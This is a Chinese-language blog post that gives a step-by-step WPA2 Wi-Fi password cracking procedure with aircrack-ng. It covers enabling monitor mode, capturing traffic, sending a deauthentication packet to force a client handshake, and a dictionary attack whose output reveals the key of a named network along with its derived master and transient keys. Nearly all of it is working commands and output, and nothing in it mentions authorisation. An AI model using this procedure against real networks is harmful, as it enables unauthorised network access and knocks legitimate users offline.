利用aircrack-ng破解wifi密码

Posted on Posted in 安全
Tips: 本文创建于2015年12月15日,已超过 2 年,内容或图片可能已经失效!

利用aircrack-ng破解wifi密码

aircrack-ng-new-logo.jpg

aircrack-ng官网

安装依赖

sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev

安装aircrack-ng

tar zxvf aircrack-ng-1.2-rc3.tar.gz  
cd aircrack-ng-1.2-rc3  
make  
make install  
mkdir ~/air  
cd ~/air  

查看本机无线网卡

$ iwconfig   
enp2s0    no wireless extensions.  
  
docker0   no wireless extensions.  
  
lo        no wireless extensions.  
  
wlx081075b47e6a  IEEE 802.11bgn  ESSID:off/any    
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm     
          Retry short limit:7   RTS thr=2347 B   Fragment thr:off  
          Power Management:off  

启动网卡的监听模式

$ sudo airmon-ng start wlx081075b47e6a #启动的时候网卡监听变名,eg:wlx081075b47e6amon,我的自动启用,所以没有结果  

扫描周围无线网络

sudo airodump-ng wlx081075b47e6a(mon)  
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID   
 20:DC:E6:BB:AD:8A  -37      206      208    0  11  54e. WPA2 CCMP   PSK  mftour-mofang

生成wifidata抓包文件

$ sudo airodump-ng --ivs -w wifidata -c 11 wlx081075b47e6a  
  
 20:DC:E6:BB:AD:8A  14:F6:5A:D0:32:14  -81    0e- 1   1942      230

开另一个终端,断一个wifi的客户端,-a路由器mac,-h客户端mac

sudo aireplay-ng -0 1 -a 20:DC:E6:BB:AD:8A -h 14:F6:5A:D0:32:14 wlx081075b47e6a(mon) 

字典穷举

$ aircrack-ng -w dict wifidata-01.ivs #-w 字典  
Opening wifidata-01.ivs  
Read 21 packets.  
  
   #  BSSID              ESSID                     Encryption  
  
   1  40:B8:9A:C4:87:DB  mofang-yunwei             Unknown  
   2  6C:71:D9:B3:FA:C9  360免费WiFi-1D          Unknown  
   3  74:DE:2B:44:0A:A0  16freewifi                Unknown  
   4  84:C9:B2:67:10:F4  CMNC ED                   Unknown  
   5  28:2C:B2:F7:F1:5B  lgj606                    Unknown  
   6  20:DC:E6:BB:AD:8A  mftour-mofang             WPA (1 handshake)  
   7  2A:B2:BD:1B:B0:5C  360免费WiFi-R8          Unknown  
   8  74:DE:2B:8D:F7:C4  US                        Unknown  
   9  22:10:B3:08:3B:6F  1234567                   Unknown  
  10  24:05:0F:28:54:FE  360免费WiFi-FE          Unknown  
  11  28:2C:B2:F4:33:FE  CMNC                      Unknown  
  12  B0:D5:9D:49:FF:54  360免费WiFi-54          Unknown  
  13  64:D9:54:BB:34:11  G                         Unknown  
  14  FC:D7:33:C7:03:3C  TP-LINK_707               Unknown  
  
Index number of target network ? 6 (找到handshake)  
  
Opening wifidata-01.ivs  
Reading packets, please wait...  
  
                                 Aircrack-ng 1.2 rc3  
  
  
                   [00:00:00] 1 keys tested (457.61 k/s)  
  
  
                          KEY FOUND! [ 1234554321 ]  
  
  
      Master Key     : C0 4F 16 71 11 C9 66 E1 05 63 47 2C D9 B7 04 C6   
                       23 3C B9 E8 91 EA CC B3 2E 9B 9F A8 B2 12 79 3D   
  
      Transient Key  : D4 CA 41 F1 93 FA 71 E5 B4 0E 1C AB BC A7 6A 22   
                       11 4B AF D0 32 11 CC 9C 02 15 13 A1 75 DA 12 D4   
                       E2 76 56 38 D5 48 37 C1 99 8E 32 85 36 41 0B 77   
                       FF 21 71 78 77 1B AF EF B8 8B 5B 96 02 AB 85 E1   
  
      EAPOL HMAC     : 67 D6 52 88 73 79 BF 82 61 74 84 2E 6A 63 61 3F   
» 转载请注明来源:呢喃 » 利用aircrack-ng破解wifi密码